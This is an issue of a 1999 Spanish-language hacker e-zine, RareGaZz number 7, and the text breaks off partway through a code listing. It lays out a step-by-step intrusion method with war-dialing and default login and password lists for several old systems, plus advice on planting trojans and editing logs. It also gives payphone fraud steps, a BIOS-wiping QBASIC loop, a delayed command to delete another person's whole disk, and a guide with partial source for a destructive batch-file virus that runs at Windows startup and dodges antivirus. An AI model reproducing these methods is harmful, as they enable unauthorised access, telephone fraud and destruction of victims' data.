RareGaZz7:(RARE007.TXT):12/12/1999 << Back To RareGaZz7

<<::RareGaZz::>> "Tu inyeccion estrobonica" oO° Numero 7 Primer año °Oo ~~~~~~~~~~~~~~~~~~~ Contenidos: 1. Hack,hAck,haCk,hacK 2. La nueva etica de los hackers 3. Robando a la Telefonica Española 4. Tips para el hacker ms-dos 5. Revision de WareZ 6. Exceso Digital 7. Guia de HTML para principiantes 8. >-C0D3Z-< 9. Informacion de algunos servidores 10. Cracker de Windows 95 11. B00/\/\3r4NG 12. NotiLOONS "RareGaZz es escrita con fines educativos y la informacion contenida no refleja el punto de vista del editor o sus colaboradores. Se autoriza su reproduccion total o parcial siempre y cuando se incluya a la revista raregazz como la fuente de los datos y la direccion (URL) completa de la pagina oficial." http://www.geocities.com/Baja/4426 RAREGAZZ@BIGFOOT.COM \0/ Editor \0/ | CrackSmoker | / \ ~~~~~~~~~~~ / \ CRACKSMOKER - KILLERBOT - LEPOMPEITOR - RARETRIP - MR.X ^^^^^^^^^^^ ^^^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^ Esta es la nueva -y ultima- llave PGP de 2048 bits -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3 mQENAzPMAlMAAAEIAMZQzI19DkA4QyK80OIExuCrZhp840Qn33nMC1laDoMAFPdU M/eXfxWnGb5cl0JX4UsmqYhH06w6Eh7LKN3M8uihxl7grSqyrK0kWheDpCS2gTCV qoD8FM5sjQon/vDtc0rMy3qm9JUSKEEiN9NiAlT4Ppa5Ms5rFxT8VAxRJ6PYuh99 3jvDGhjMmKsNatv3UKiNiztfOtfP+FzO/NouPpUh38q2/OryHIgBsoGSIKJjWwHw jhsj0PHl2cHoRsYWJhFCfAHFcQ29jiU17JFItxvZ8klEgPS/jRphpi93ICJ1pWq7 2TSZ2Y+fH4LBlRgGZ/pmkrtAahP7rjA7ZhGTxN0ABRG0KVJhcmVHYVp6IDIwNDgg Qml0cyA8UkFSRUdBWlpAQklHRk9PVC5DT00+ =e/tl -----END PGP PUBLIC KEY BLOCK----- " Dejad que las niñas se toquen entre si " Pervertido del D.F., ~~~~~~~~~~~~~~~~~~~~ " Como te va en la universidad ??? muy bien ma' ... ahh, gracias por pagar la fianza " Cracksmoker en dias recientes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< Intro... Esto que estan leyendo lo edite - recorte y modifique yo mero asi que las preguntas y mentadas se las aguantan por que no les pienso decir mi e-mail >B-) mi articulo favorito de este numero es exceso digital de NiK, y Hack,hAck,haCk,hacK (por si querian saber). Quizas lo mas importante que logre fue convencer a raretrip de permitirme modificar la pagina de la revista cosa que no fue facil. La verdad se ve casi igual pero cambie algunos nombres de archivos y puse scripts para UNIX y LINUX como editores de logs y otras cositas. Yo no soy bueno para estar delante de los rayos catodicos hablando con el monitor y ademas mi compa de cuarto ya esta molestandome para que apague la compu por que quiere dormir |-( los dejo con nada mas que un monton de ceros y unos para su extreñimiento y leisure ... CkSmkr >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< <<::RareGaZz::>> "La resistencia es inutil" ||~"~"~"~"~"~"~"~"~"~"~"~"~|| || Hack, hAck, haCk, hacK || || ~~~~~~~~~~~~~~~~~~~~~~~ || *"~"~"~"~"~"~"~"~"~"~"~"~"~"* "Parte de la informacion aqui contenida a sido sacada del excelente texto por The Mentor. Este texto no esta tal cual lo escribio Mentor, a sido ampliado y estudiado para adaptarlo a las necesidades especificas del texto. La seccion sobre redes NUIS y NUAS a sido removida mientras que el paso 2 `preparacion mental' fue dejado casi intacto. Si has visto alguna de la informacion aqui contenida ya sabes de donde salio..." raretrip. Ciertamente para ser hacker no existe medicamento (quiza alguna pastilla pueda ayudar :) pero si hay un metodo a seguir y aqui en raregazz en este numero tratare de explicarlo. Debes seguir los pasos que te voy a dar con precision, inteligencia y mucha paciencia. Nadie se convierte en hacker de un dia a otro obtener el conocimiento y las herramientas necesarias lleva mucho tiempo e intentos. PASO 1. Herramientas """""""""""" - Un scanner telefonico (ToneLoc y PhoneTag sirven para esto) - Un buen cliente de comunicaciones (con distintas emulaciones como ProComm) - Una lista de los defaults para cada sistema. - Un scanner de direcciones I.P. (en caso de contar con conexion permanente) - Un cliente de Telnet (con distintas emulaciones) * emulaciones minimas: Ansi, Avatar, Prism, TTY, VT52, VT102. El programa debe ser capaz de emular distintos baud rates (300,1200,2400,4800,9600) y tambien debera poder cambiar de Paridad (None,Even,Odd,Space,Mark), Data Bits (7,8) y Stop Bits (1,2). PASO 2. Preparacion Mental """""""""""""""""" Debes estar preparado para fracasar en muchisimos intentos pero valdra la pena en el momento que logres hackear tu primer sistema. Debes tener en cuenta que estaras tratando de entrar a un sistema para conocerlo y dominarlo unicamente mas no para dañarlo o modificarlo. Si alguna vez te dijeron que es mejor armonizar con la naturaleza que modificarla entonces aplica esto a tus experiencias como hacker. Ten cuidado, no seas flojo y limpia tus huellas antes de abandonar un sistema al que hayas entrado con la cuenta de otra persona. Estas son las recomendaciones mas importantes: I. No dañes intencionalmente *ningun* sistema. II. No alteres ningun archivo excepto los necesarios para asegurar que nadie pueda detectarte y asegurar futuros accesos (Caballos de Troya, Alterar Logs, y cosas asi son necesarias para sobrevivir el mayor tiempo posible dentro de un sistema). III. No dejes tu nombre (o el de otra persona), handle -nick- o numero telefonico en ningun sistema. IV. Ten cuidado con quien compartes informacion. V. No des a conocer tu numero telefonico a nadie sin importar que tan k-rad parezcan ser. Esto incluye SYSOPs de BBS. Si necesitas algunos datos para ser validado consiguete una revista de niños como Gasparin y busca los datos que aparecen en algunas paginas (nombre,direccion,telefono,ciudad), tambien puedes usar los datos que vienen en las revistas de moda donde gente busca correspondencia con otras personas. VI. No intentes hackear computadoras del gobierno o de la compañia telefonica si eres principiante. VII. No uses C0D3Z (PBX's) mas de lo necesario. Si los usas por mucho tiempo seras sorprendido. punto. VIII. No temas a ser paranoico. Recuerda que *estas* haciendo daño a un administrador. No te lastimara tener tu disco encriptado o enterrar tus notas en el patio :-) IX. Nunca pongas nada en BBS sobre algun sistema que estes hackeando, tampoco uses sus sistemas de correo sin encripcion. Recuerda que el tipico SYSOP lee todos los mensajes de su sistema en su afan de sentirse dios (es por eso que es el sysop de un BBS). X. No tengas miedo en preguntar. Para eso estan los hackers avanzados, no esperes que todo sea contestado pero vale la pena intentar. XI. Finalmente tendras que hackear, no importa lo que hagas ni cuanto tiempo te la pases en BBS de hackers o compartas informacion con otros algun dia tendras que realmente empezar a hacerlo. Los mejores lugares para empezar a hackear son las universidades y colegios donde los admins son jovenes y creen que sus sistemas son invulnerables lo que paradojicamente los hace vulnerables. Finalmente te recomiendo hacer un viaje a tu universidad local y pedir un login/password para tener acceso a internet. Lo bueno de esto es que te permiten conocer un sistema desde adentro podras explorarlo lo mas que quieras y asi ganar experiencia en el uso de unix, linux, o en cualquiera que sea el sistema que tengan. PASO 3. ENCONTRAR UN SISTEMA """""""""""""""""""" Para encontrar una computadora conectada al telefono es necesario hacer algo conocido como phone scanning. Phone scanning o barrido de telefonos consiste en hacer llamadas a numeros telefonicos de forma consecutiva o al hazar para encontrar tonos de computadora que son llamados carriers. Este metodo es necesario para todo hacker que quiera encontrar sistemas interesantes y desconocidos. Lo bueno de hacer esto es que nunca sabes que tipo de sistema encontraras, puede ser el de un MacDonalds o tambien el de la gasolinera de la esquina... Suponiendo que los numeros en tu ciudad sean de 5 digitos algo logico y no muy dificil de hacer es realizar una busqueda en los ultimos 3 digitos de un principio determinado. Digamos que buscaremos desde 39000 a 39999 asi, se tendrian que hacer 999 intentos y en ocasiones encontras numeros de Fax, Telex, PBX's, etc. hacer esto manualmente suena estupido y lo es, por lo que necesitaras un programa buscador de carriers -disponible en la pagina de la revista- configurarlo y empezar a jugar. Si no quieres que tu cuenta telefonica llegue a tu casa en cajas puedes buscar los numeros que se encuentran en los prefijos de llamada gratuita. Aqui en Mexico todos los numeros que comienzan en 01-800 (antes 91800) cargan el costo de la llamada a la compañia que recibe la llamada. Otra forma de hacerlo es por medio de un PBX, si no sabes que es un pbx espera un texto sobre eso proximamente... El mismo tipo de busqueda puede hacerse en Internet. Hay programas que buscan sistemas determinados en direcciones IP. PASO 4. ENCONTRE UNA COMPUTADORA, AHORA QUE?? """"""""""""""""""""""""""""""""""""" No importa como diablos encontraste un sistema pudo ser a travez de una red o de un scanneado telefonico, pero ahora que hacer?? Pues principalmente llegar al prompt y de ahi hackear un login y la contraseña correcta. Esto es relativamente facil a travez de la ingenieria social y muy dificil con un ataque bruto asi que la otra alternativa son los defaults. A continuacion una lista de los sistemas que probablemente encontraras y los defaults que necesitaras saber. VMS - La computadora VAX es creada por Digital Equipment Corporation (DEC) y corre el sistema operativo VMS (virtual memory system). VMS se caracteriza por su prompt 'Username:'. Este sistema no te dira si has entrado un login correcto o no y te desconectara despues de tres malos intentos. Tambien mantiene un record de todos los logins que fallaron e informa al dueño de la cuenta la proxima vez que entre cuantos intentos fallados se hicieron. Es uno de los sistemas mas seguros desde fuera pero ya dentro tiene varios errores en la seguridad. Las VAX ademas tienen uno de los mejores archivos de ayuda de entre los demas sistemas, para accesar a esta ayuda solo escribe HELP en el prompt. Las cuentas defaults comunes son: [ usuario: password [,password] ] Login Password ~~~~~ ~~~~~~~~ SYSTEM OPERATOR o MANAGER o SYSTEM o SYSLIB OPERATOR OPERATOR SYSTEST UETP SYSMAINT SYSMAINT o SERVICE o DIGITAL FIELD FIELD o SERVICE GUEST GUEST o sin password DEMO DEMO o sin password DECNET DECNET DEC-10 - Esta es el equipo de computo mas nuevo que existe dentro de la linea de DEC's. Operan el sistema operativo TOPS-10. Este tipo de maquinas se reconocen por el prompt "." Las series DEC-10/20 son amables con los hackers permitiendo varios intentos en el login prompt sin guardar un log de los intentos fallados. Las cuentas estan en forma [xxx,yyy]. Lo mejor de este sistema es la posibilidad de obtener informacion sobre las personas en linea antes de entrar a el usando el comando systat. Si ves una cuenta que lea [234,1001] BOB JONES, seria inteligente probar como password BOB, JONES, BOBBY, etc. Para entrar al sistema se usa el comando: login xxx,yyy [enter] password: Este sistema como antes lo habia dicho, permite intentos sin limite y ademas te avisa si el login que estas usando existe. Las cuentas defaults comunes son: Login Password ~~~~~ ~~~~~~~~ 1,2 SYSLIB o OPERATOR o MANAGER 2,7 MAINTAIN 5,30 GAMES UNIX - Este sistema ya a sido ampliamente revisado en los numeros anteriores de este zine, de hecho tenemos publicada una lista de cuentas defaults que reproducire del numero pasado: ┌────────────┬──────────┐┌────────────┬──────────┐ │ Default │ Password ││ Default │ Password │ ├────────────┼──────────┤├────────────┼──────────┤ │decnet │ddennet ││guest │friend │ │field │service ││guest │welcome │ │system │manager ││default │user │ │decnet │nonpriv ││field │digital │ │field │test ││netnonpriv │nonpriv │ │postmaster │mail ││sysmaint │service │ │sysmaint │digital ││system │operator │ │system │manager ││system │syslib │ │system │uetp ││systest_clig│systest │ │userp │user ││sysadmin │admin │ │daemon │daemon ││sysbin │sysbin │ └────────────┴──────────┘└────────────┴──────────┘ PRIME - Esta computadora opera con el sistema operativo Primos. Son faciles de detectar ya que lo reciben a uno con el mensaje "Primecon xx.xx.xx" o algo parecido dependiendo de la version que te encuentres. Usualmente no ofrecen ningun prompt asi que debes escribir "login <usuario>". Si la version es anterior a la 18.00.00 puedes presionar un monton de caracteres de escape o CTRL-C y entraras. Este sistema ofrece la capacidad de conectarte a los NUAS de todo el mundo con el comando NETLINK...sintax: nc <nua> Las cuentas defaults comunes son: Login Password ~~~~~ ~~~~~~~~ PRIME PRIME o PRIMOS PRIMOS_CS PRIME o PRIMOS PRIMENET PRIMENET SYSTEM SYSTEM NETLINK NETLINK TEST TEST o PRIME o PRIMOS GUEST GUEST o PRIME GUEST1 GUEST HP-x000 - Este sistema es elaborado por Hewlett-Packard. Se caracteriza por el prompt ":". La secuencia de entrada a este sistema es una de las mas complicadas debes escribir: "HELLO SESSION NOMBRE,USUARIO,NOMBRE-DE-CUENTA,GRUPO" Afortunadamente algunos de esos campos pueden dejarse en blanco. En ocasiones todos los campos estan protegidos con passwords por lo que este sistema no es uno de los mas faciles de accesar. Las cuentas defaults comunes son: Login USER ~~~~~ ~~~~ MGR.TELESUP,PUB MGR Acct: HPONLYG rp: PUB MGR.HPOFFICE,PUB FIELD.SUPPORT,PUB FLD, MAIL.TELESUP,PUB MAIL, MGR.RJE FIELD.HPP189 ,HPP187,HPP189,HPP196 MGR.TELESUP,PUB,HPONLY,HP3 IRIS - Iris significa (interactive real time information system). Originalmente corria en PDP-11's, pero ahora corre en otras minis. Para identificar uno de estos sistemas busca el texto "Welcome to `IRIS' R9.1.4 Timesharing" y el prompt ACCOUNT ID? (algunas veces es cambiado). IRIS no tiene limites a la hora de hackear una cuenta y no guarda un log de los intentos fallados. (si alguien conoce defaults pueden enviarlos :) VM/CMS - Este sistema es ejecutado en las super computadoras de IBM (International Business Machines) llamadas mainframes. Una vez conectado a una de estas computadoras te mostrara un mensaje asi "VM/370 ONLINE", y te dara un prompt "." justo como la TOPS-10 lo hace. Para entrar debes ejecutar: LOGON <usuario> Las cuentas defaults comunes son: Login Password ~~~~~ ~~~~~~~~ AUTOLOG1 AUTOLOG o AUTOLOG1 CMS CMS CMSBATCH CMS o CMSBATCH EREP EREP MAINT MAINT o MAINTAIN OPERATNS OPERATNS o OPERATOR OPERATOR OPERATOR RSCS RSCS SMART SMART ??? SNA SNA VMTEST VMTEST VMUTIL VMUTIL VTAM VTAM NOS - NOS significa Networking Operating System y corre en la Cyber computadora hecha por Control Data Corp. A este sistema lo puedes identificar facilmente por la bienvenida "WELCOME TO THE NOS SOFTWARE SYSTEM...". El primer prompt que recibiras sera FAMILY: (presiona enter) depues llegaras a otro prompt USER NAME: donde cada uno es de 7 digitos alfanumericos y son dependientes del sistema por lo que no son palabras o frases conocidas. Decserver - Las DECs son una serie de computadoras conectadas entre si para formar una sola unidad de procesamiento, la funcionalidad de estos sistemas es altamente utilizado por los hackers para quebrar passwords de cuentas unix por la rapidez del sistema. El prompt usualmente sera: "Enter Username>" aunque yo he visto otros prompts en estos sistemas. El nombre de usuario puede ser cualquier cosa, lo mejor sera presionar algo nada sospechoso como `c' o algun numero. De ahi te presentara con el prompt `local>'. De ahi debes ejecutar `c <sistema>' para conectarte. Para obtener una lista de sistemas conectados ejecuta `sh' `services' o `sh nodes'. En algunos sistemas DEC'S existen comandos como MODEM o DIAL que permiten hacer uso de un modem para llamadas externas que te permitiran marcar a BBS internacionales a expensas de la compañia que opera el DEC. SISTEMAS QUE NO RESPONDEN ~~~~~~~~~~~~~~~~~~~~~~~~~ Casi siempre que hagas un `barrido de telefonos' encontraras sistemas que no ofrecen prompts de ningun tipo dando un sentimiento de frustracion a todo hacker wannabe. Recuerda que algunas veces puede tratarse de Telex, Fax o algun otro tipo de carrier asi que asegurate del tono que recibes. Para hacer que *algo* pase sigue las siguientes instrucciones... Deberas probar todas las posibilidades usando diferentes configuraciones en tu programa de comunicaciones juega con la paridad, baud rate (usualmente todos contestan a 300bps), y stop bits. Algunos sistemas como seguridad unicamente ofrecen conexiones a velocidades de 600 o 1100 bits asi que asegurate de intentar todas. Envia Enters, Hard Breaks (todo programa de comunicacion lo hace) y distintas combinaciones de ambos. Prueba escribiendo puntos o palabras como LOGIN, LOGON, ETC. Envia caracteres de control como CTRL + A..Z Lo mas importante es los tipos de terminales, si empiezas a recibir basura en tu programa de comunicaciones cambia tu terminal. Generalmente lo tenemos en ANSI pero a la hora de hackear yo recomendaria vt-100 o alguna otra como AVATAR o PRISM. Si haciendo lo anterior no has podido entrar probablemente sea necesario un software proporcionado por la compañia dueña del sistema como lo hace McDonald's y Gigante (Mexico). Si el numero telefonico que quieres penetrar es 100 intentar marcar via voz a 101 o 99 y usando ingenieria social obten informacion necesaria para lograr tu objetivo. >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ETICA DE LOS HACKERS PARA LOS 90'S Las primeras generaciones de hackers crearon sus propias reglas de conducta que con el paso del tiempo han quedado obsoletas. En este texto se muestran las reglas de conducta y objetivos de los hackers de 1958 y su equivalente con la etica actual. 1958 - TODA LA INFORMACION DEBE SER LIBRE 1997 - EL ACCESO A LA INFORMACION SOBRE LA TECNOLOGIA DEBE SER GRATIS "Es estupido y ridiculo pensar que las compañias e individuos deben proporcionar sus productos gratis." Probablemente los primeros hackers se referian con esta sentencia a proporcionar el codigo fuente de algun programa a la comunidad o tal vez se referian a la informacion sobre carriers o logins para sistemas pero dudo mucho que se refirieran a la informacion que actualmente se vende como software o publicaciones electronicas como el New York Times. El unico heroe que existiria si esta sentencia debiera ser seguida al pie de la letra seria el "WaReZ DuDe" que proporciona acceso gratuito al codigo comercial de alguna compañia. Una diferente interpretacion seria: "El acceso a las computadoras y a la tecnologia necesaria para accesar a la informacion debe ser gratis. Las escuelas y librerias publicas deben ser equipadas con computadoras y acceso a internet en cantidades adecuadas para permitir a aquellos sin los medios ser parte de la revolucion de las computadoras. Este acceso deber ser ilimitado y no estar restringido, los individuos deben tener acceso a la libertad de elegir que informacion desean obtener. La prohibicion de cualquier tipo de informacion (pornografia,bombas,etc) solo fomenta el deseo de obtenerla a como de lugar." 2. 1958 - ACCESO A LAS COMPUTADORAS -- Y TODO LO QUE PUEDA ENSEÑARTE ALGO SOBRE COMO FUNCIONA EL MUNDO -- DEBE SER ILIMITADO Y TOTAL. 1997 - TECNOLOGIA PARA LAS MASAS DEBE SER BARATA. TECNOLOGIA DESCARTADA DEBE SER GRATIS! La idea de los primeros hackers era bastante buena pero hoy en dia parece una utopia el lugar donde las computadoras sean gratuitas. A falta de mentes brillantes que logren esto muchos se han conformado con pedir el acceso a la tecnologia que a pasado de moda gratis. Es una forma de equipar escuelas con computadoras. El problema es que la mayoria de las compañias prefieren tirarlas que gastar dinero en el tramite que lleva el donar computadoras. "Los hackers de los 70's como Bill Gates se han vendido a los BMW y Corvettes en lugar de hacer la tecnologia gratuita o por lo menos barata a las masas." 3. 1958 - DESCONFIA DE LA AUTORIDAD -- PROMUEVE LA DESCENTRALIZACION 1997 - DESCONFIA DE TODOS -- PROMUEVE UN GOBIERNO DESCENTRALIZADO Los hackers de hoy en dia nos enfrentamos a muchos mas problemas y enemigos que aquellos que empezaron. Para empezar nosotros burlamos la seguridad de las compañias telefonicas, hacemos a otros hackers celosos y la policia cuenta con hackers traidores. 4. 1958 - LOS HACKERS DEBEN SER JUZGADOS POR SUS HACKS, NO POR CRITERIOS ESTUPIDOS COMO SEXO, RAZA, EDAD O POSICION SOCIAL. 1997 - LOS HACKERS DEBEN SER JUZGADOS POR SUS HACKS. PUNTO. Los hackers que forman parte de la sociedad conviven con hackers de distintas culturas, colores, sexos y preferencias sexuales :) Negar a un tipo de hacker especifico es negar a la sociedad misma. 5. 1958 - TU PUEDES CREAR ARTE Y BELLEZA EN UNA COMPUTADORA 1997 - TU PUEDES ELEGIR ENTRE CREAR BELLEZA O CAOS EN UNA COMPUTADORA, LA DECISION ES TUYA. Esta se explica por si sola. Asi como todo en la vida - puedes elegir entre usar tus talentos para bien o mal. Ultimadamente, la decision es tuya. >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< PhuCk1nG a la 73l3F0n1C4 ~~~~~~~~~~~~~~~~~~~~~~~~ Si quieres hacer llamadas gratis desde los telefonos publicos de la telefonica española desde telefonos como el que se muestra en el diagrama sigue las indicaciones . . . Primero necesitas encontrar un telefono de la Telefonica que tenga el enchufe al alcance y donde no llame mucho la atencion ya que necesitaras desconectarlo brevemente. Si encuentras este tipo de telefonos preparaos para hacer llamadas gratis nacionales e internacionales. ___________Hoyo_____ / \ | ----- | | /-\ | | | | \_/ ----- | | [|] mf ? | | [|] 1 2 3 | | [|] 4 5 6 | | [|] 7 8 9 | | /-\ * 0 # | | \-/ _______ | | | | | | |_______| | |--------------------| \____________________/ |Plug!| |_____| Inserta una moneda de 25 pesetas en el telefono (el slot largo de 25 pesetas no en el pequeño). Despues, presiona el audicular nueve decimas hacia abajo hasta que sientas un poco de resistencia. Si tu moneda es devuelta lo has hecho mal, pero si la pantalla comienza a flashear lo hiciste correctamente. Ahora seria bueno poner una tarjeta sobre la pantalla con algun numero apuntado (para disimular) por si alguien pasa por el telefono no vea la pantalla flasheando. Una vez hecho esto, marca "003". Cuando se conecte escucharas una grabacion en español y rapidamente desconecta y conecta el telefono. Ahora escucharas un tono parejo y todo lo que teneis que hacer es marcar el boton "mf" que sirve para hacer otra llamada cuando hayas colgado. Una ves que marques el boton "mf" eres libre para llamar a cualquier parte del mundo! Si terminaste de llamar presiona "mf" de nuevo para hacer otra llamada. Cuando cuelgues probablemente recibiras tu peseta. >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< "TIPS PARA EL HACKER DE MS-DOS" Primera parte por YO ~~~~~~~~~~~~~~~~~~~~ Este texto va dirigido a los estudiantes de los colegios que tengan laboratorio de computacion donde usen windows y DOS (en los colegios nunca te van a enseñar unix puesto que la mayoria de ellos, usan ese sistema para facilitar la entrada de notas a los profesores), o cualquier persona en general... PROFE MALO : El profe desactivo la disquetera desde el SETUP y le ha puesto clave, no es problema solo tienes que hacer este programa con el QBASIC : FOR I=34 TO 65535 OUT I,34 NEXT I Y listo.. este programa, borra el setup completo y solo tienes que detectar el disco duro, etc... Nota : Este programa lo he probado en el Lab de Comp de mi colegio y en mi casa, no se si sirva en todos los PC, y tampoco si produce algun daño... ESCONDIENDO DIRECTORIOS : Esto sirve para esconder cosas XXX, archivos importantes, o programas del profesor de comp. Lo que tienes que hacer es crear un directorio con caracteres especiales ASCII (╖±⌡) y le haces un "ATRIBB nombre_directorio +h +r +s -a". [ caracter recomendado: ALT + 255 ] Esto funciona en DOS y en windows, porque al poner attribb solo, este muestra solo los archivos, no los directorios y para poder entrar debe poner el nombre del directorio que va a hacer casi imposible entar por los caracteres ASCII, deben estar pensando que windows puede, pues no, porque por tener caracteres especiales, windows dice que no existe o no tiene nada, ya que windows cambia esos caracteres, el archivos se vera con otro nombre y no se podra borrar, pero para entar a ese directorio, ustedes deben hacer un archivo por lotes que sustituya el directorio por una unidad con la utilidad SUBST : @ECHO OFF SUBST unidad_nueva: unidad:nombre_directorio unidad_nueva: [ Si nuestro directorio se llama C:\(ALT+255) se haria asi: SUBST F: C:\(ALT+255) <-- ENTER F: <-- ENTER donde F: es el dir con los programas que quieras esconder. Para deletear el nuevo escribe esto: SUBST /D F: ] Asi podran grabar cualquier programa al computador sin que el profe se de cuenta... En el archivo ZIP incluido con esta revista viene un programa TSR que hace que algunas aplicaciones se ejecuten a una hora determinada, sirve para una buena broma a algun amigo o profesor que sepa poco... Ej: delay /t15:30 /fdeltree /y *.* (no lo hagan es un ejemplo dañino) [ La computadora no debera ser apagada hasta que llegue la hora ] "TIPS PARA EL HACKER DE MS-DOS" Segunda parte por mr.x ~~~~~~~~~~~~~~~~~~~~~~ yo nomas les voy a enseñar a usar la utileria RDEL.COM (incluida en el archivo UTILS.ZIP) que me parece bastante divertida. Este archivo lo consegui como codigo fuente en una revista impresa mexicana. primero veamos una estructura ms-dos ejemplo: |---DOS | |---SYSTEM C:\-|---WINDOWS---| |---TEMP | |---FONTS supongamos que quisieramos borrar todos los archivos que tengan extension .tmp y que esten en el directorio windows y los que siguen pero sin borrar los archivos .tmp de otros directorios. usualmente hariamos: C: CD\WINDOWS DEL *.TMP CD\WINDOWS\SYSTEM DEL *.TMP CD\WINDOWS\TEMP DEL *.TMP CD\WINDOWS\FONTS DEL *.TMP pero casi siempre el directorio windows tiene varios subdirectorios lo que hace a este metodo cansado y lento. veamos como se haria con RDEL.COM : C: CD\WINDOWS RDEL *.TMP Al usar la " \ " en este comando borra los archivos que le digamos de TODOS los subdirectorios del directorio principal. Como ultimo ejemplo benigno seria borrar todos los FILE_ID.DIZ del disco duro: RDEL \FILE_ID.DIZ si queremos borrar todos los archivos del disco (de otra persona claro) sin necesidad de que aparesca Y/N usamos el programa asi: RDEL \*.* si usamos la utilidad de YO y la unimos a esta tendremos una bomba de tiempo bastante efectiva. ! tienes que poner a rdel.com en el path para que el comando pueda ser ejecutado desde cualquier directorio ! [ ¿ que es el path ? cuando ejecutas un programa como FORMAT.COM o WIN.COM lo puedes hacer sin importar en que directorio o drive estas por que el programa esta en el path. para saber cual es el path (o directorios en los que puedes guardar archivos para ser ejecutados desde cualquier parte) escribe en el prompt PATH y da un enter. si copias un programa a un directorio que este en el path se ejecutara desde cualquier subdirectorio o drive. La linea path se puede definir desde el AUTOEXEC.BAT poniendo una linea mas o menos asi en el archivo: PATH=C:\DOS;C:\PGP;C:\WINDOWS;C:\XXX;C:\LOQUESEA; los directorios estan divididos por " ; " (punto y coma) para que sean reconocidos como variables del sistema. CkSmkr ] "TIPS PARA EL HACKER DE MS-DOS" Tercera parte por raretrip para RareGaZz -bye bye virii- Despues de haber leido y entendido esta parte ustedes podran crear sus propios VIRUS basados en MSDOS!! Para hacerlo no necesitan conocimientos previos de programacion ni cosas de esa especie. Lo unico que necesitan conocer son algunos comandos BATCH y features de sistemas como windows. Puedes modificar este virus tanto como quieras para adaptarlo a diferentes sistemas y niveles de venganza! BASE DEL VIRUS El virus se basa en el feature de todas las versiones windows de ejecutar el archivo WINSTART.BAT si lo encuentra en C:\WINDOWS antes de iniciar el sistema por completo. Recuerda que todas las versiones de windows se ven afectadas. Lo que hace el virus es simplemente buscar el archivo userz1.dat en el directorio c:\windows si lo encuentra simplemente devuelve el control a windows y todo sigue normal. En caso de no encontrar el archivo userz1.dat en el directorio comienza el conteo...washington, we got a problem! En el codigo original del programa solamente espera que se inicie windows 8 veces para ejecutar el programa que tu quieras pero eso puedes modificarlo. Cuando se borra el userz1.dat se crean archivos 'temporales' que serviran de contador del virus; revisando el codigo entenderas su funcion. Cuando se instala el programa revisa si existe el c:\windows\winstart.bat si lo encuentra lo copia a c:\windows\after.bat y pone unicamente en el c:\windows\winstart.bat el comando CHKSYS una vez ejecutado chksys al finalizar correra c:\windows\after.bat y regresara el control a windows. En total, la instalacion necesita copiar los archivos - chksys.bat - sysinis.ini - bakbmb.ini al directorio c:\windows para el buen funcionamiento del virus y copiar el archivo execute.dat a c:\windows\winstart.bat que contiene el comando chksys [ se refiere al virus incluido en el archivo virii.zip pero tu virus bien podria copiar los archivos chksys.bat, sysinis.ini y bakbmb.ini al dir de windows y agregar la linea CHKSYS al winstart.bat ] PAYLOAD El virus necesita los archivos c:\windows\sysinis.ini y c:\windows\bakbmb.ini pues esos son los programas que ejecutara cuando la pc con windows se inicie 8 veces *despues* de haberse eliminado userz1.dat El codigo que viene en la revista incluye un troya con una grafica malisima (sysinis.ini) y el puro troya en caso de fallar el otro (bakbmb.ini). Algun otro tipo de kaoz seria copiar un virus a uno de los dos archivos ya que no es necesario que los dos esten presentes. CODIGO BASE Las lineas que empiecen con ~@~ son comentarios por si acaso quieres modificar el codigo y eliminar la necesidad de borrar el userz1.dat para que empieze el conteo. ----------Comienza bye bye virii por raregazz-----CHKSYS.BAT------------------ @echo off ~@~ borra el input del prompt if exist c:\windows\countdw.001 goto menos1 ~@~ revisa si existe el archivo countdw.001 si es asi, brinca a menos1 if exist c:\windows\countdw.002 goto menos2 ~@~ revisa si existe el archivo countdw.002 si es asi, brinca a menos2 if exist c:\windows\countdw.003 goto menos3 ~@~ revisa si existe el archivo countdw.003 si es asi, brinca a menos3 if exist c:\windows\countdw.004 goto menos4 ~@~ revisa si existe el archivo countdw.004 si es asi, brinca a menos4 if exist c:\windows\countdw.005 goto menos5 ~@~ revisa si existe el archivo countdw.005 si es asi, brinca a menos5 if exist c:\windows\countdw.006 goto menos6 ~@~ revisa si existe el archivo countdw.006 si es asi, brinca a menos6 if exist c:\windows\countdw.007 goto byebye ~@~ revisa si existe el archivo countdw.007 si es asi, brinca a byebye if not exist c:\windows\userz1.dat goto explode ~@~ si no existe c:\windows\userz1.dat brinca a explode goto end ~@~ si encuentra a c:\windows\userz1.dat brinca al final ~@~ para hacer al virus una bomba de tiempo remueve las dos ultimas lineas ~@~ dejando el comando "goto explode" despues de revisar el countdw.007 :byebye ~@~ esta es la rutina destructiva! if not exist c:\windows\sysinis.ini goto nobomb ~@~ si no existe c:\windows\sysinis (el troya#1) brinca a nobomb copy c:\windows\sysinis.ini c:\windows\bye.exe /y >nul ~@~ copia el sysinis.ini a un ejecutable. Hace esto para evitar que algun ~@~ antivirus revise el troya aunque hasta la fecha el incluido por default ~@~ no es detectado. del c:\windows\countdw.007 >nul ~@~ borra el archivo countdw.007 c:\windows\bye.exe help ~@~ ejecuta el archivo bye.exe alterado con HACKCOM *del programa kaos* para ~@~ ejecutarse normalmente (grafica) y como tiene la clave help despues el ~@~ otro programa 'pegado' (troya). :nobomb ~@~ en caso de no encontrar 